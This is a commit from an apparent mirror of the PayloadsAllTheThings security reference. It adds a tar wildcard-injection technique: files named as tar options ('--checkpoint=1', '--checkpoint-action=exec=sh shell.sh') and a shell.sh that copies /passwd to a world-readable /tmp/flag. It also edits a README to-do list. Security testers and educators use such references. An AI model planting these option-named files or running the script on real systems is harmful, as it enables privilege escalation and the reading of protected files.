mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Tar command exec
This commit is contained in:
parent
22b68979b4
commit
bed3967509
@ -1,11 +1,9 @@
|
||||
# Payloads All The Things
|
||||
A list of every usefull payloads and bypass for Web Application Security
|
||||
A list of usefull payloads and bypasses for Web Application Security
|
||||
|
||||
TODO:
|
||||
* XSS
|
||||
* Upload
|
||||
* Traversal Directory
|
||||
* Tar
|
||||
* PHP Serialization
|
||||
* CSV Injection
|
||||
|
||||
@ -14,5 +12,7 @@ To improve:
|
||||
* SQL injection
|
||||
* XXE
|
||||
* SSRF
|
||||
* Upload
|
||||
* Tar command exec
|
||||
|
||||
# /!\ Work in Progress : 1%
|
||||
|
0
TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh
Executable file
0
TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh
Executable file
0
TAR_Code_Exec/--checkpoint=1
Executable file
0
TAR_Code_Exec/--checkpoint=1
Executable file
@ -1,12 +1,14 @@
|
||||
# Title
|
||||
Lorem
|
||||
# TAR Command Execution
|
||||
By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.
|
||||
|
||||
## Vuln
|
||||
## Exploit
|
||||
|
||||
These files work against a "tar *"
|
||||
```
|
||||
Code
|
||||
--checkpoint=1
|
||||
--checkpoint-action=exec=sh shell.sh
|
||||
shell.sh (your exploit code is here)
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* Lorem
|
||||
* Ipsum
|
||||
*
|
3
TAR_Code_Exec/shell.sh
Executable file
3
TAR_Code_Exec/shell.sh
Executable file
@ -0,0 +1,3 @@
|
||||
#!/bin/bash
|
||||
cat /passwd > /tmp/flag
|
||||
chmod 777 /tmp/flag
|
Loading…
Reference in New Issue
Block a user